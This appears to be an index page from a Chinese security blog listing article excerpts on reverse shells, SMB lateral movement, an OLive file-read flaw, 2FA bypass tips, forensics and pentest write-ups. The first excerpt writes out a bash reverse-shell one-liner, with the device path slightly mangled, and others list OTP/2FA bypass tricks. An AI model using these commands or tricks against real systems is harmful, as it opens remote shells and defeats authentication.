反弹:bash -I >& /tcp/dev/127.0.0.1/9999 0>&1反弹(反向):被控制端连接攻击者,攻击者监听端口等待被控制端连接我们bash -I 创建...
07月18日安全文章18 views评论socket
攻击者
Linux bash 反弹Shell
07月18日安全文章18 views评论socket
攻击者
07月18日安全文章18 views评论socket
攻击者
内网横向知识
0x00 利用 SMB 来进行横向移动smbexec 可以通过文件共享在运程系统中执行命令。对方主机需要开启 c$ 共享,依赖于 445 端口。psexec简介psexec 是 windows 下非常...
07月18日85 views评论admin
net
微软官方项目OLive存在任意文件读取漏洞(暂未修复)
点击蓝字·关注我们全文 742 字,预计阅读时间 2 分钟前言最近看一个关于flask的send_file()函数滥用,导致任意文件读取的漏洞点。发现有研究者在2022年3月就发现...
07月18日58 views评论github
漏洞
谈谈数据泄露的排查方法
序言数据泄露对于企业和个人来说都是致命性的影响,企业在运营过程中,对数据的保护是至关重要的,如果企业的数据因内外部原因而出现数据泄露的情况,那么这必将对企业的正常运营发展带来风险和影响。下面就谈谈针对...
07月18日93 views评论企业
数据泄露
研究人员破解MEGA的“设计隐私”存储、加密。
MEGA声称其存储服务在设计上是私有的,但据研究人员称,该技术受到“严重”安全问题的困扰。MEGA 总部位于新西兰,是一个云存储服务和消息传递平台,为超过2.5 亿用户提供端到端加密。MEGA还允许用...
07月18日121 views评论密码
用户
Web Tips
绕过身份认证响应/状态码操作。蛮力otp。OTP 使用后不会过期。从账户 A 和 V 请求 2 个令牌。在 V 的账户中使用 A 的令牌。尝试在不解决 2FA 的情况下直接转到仪表板 URL。如果不成...
07月18日26 views评论com
代码
内存取证实战应用之破解BitLocker加密
一次信息泄露到越权支付的实战
免责声明由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即...
07月18日69 views评论id
公众号
实战|记一次某系统的渗透测试
开端前几个月被授权进行某大型运营商的渗透,在过程中也是遇到了一些比较有意思的东西,特此记录一波最开始是通过一个webpack+未授权访问的接口获取了另一个系统的权限,根据获取到的口令进行复用对其他资产...
07月18日26 views评论加密
密码
每日小知识
PNG怎么识别PNG开头89 50 4E 47怎么修改图片横长,纵长分离PNG如图,在jfif中的PNG将其复制在此处新建新建后的PNGJFIF以FF D8开始以FF D9 结束ZIP伪加密50 4B...
07月18日131 views评论文件目录
每日小知识
推动漏洞修复路上的二三事儿(续)
接上一篇:《推动漏洞修复路上的二三事儿》“小张,我们部门的漏洞列表麻烦发我一下。”“漏洞信息都在漏洞管理系统上呢,可以直接查看,而且漏洞信息会定期更新,直接看会更方便一些呢。”“可是我看到的没那么多漏...
07月18日18 views评论漏洞修复
管理系统
CISSP考试指南笔记:8.3 软件开发模型
Waterfall MethodologyThe Waterfall methodology uses a linear-sequential life-cycle approach,Each pha...
07月18日安全闲碎10 views评论project
team
11679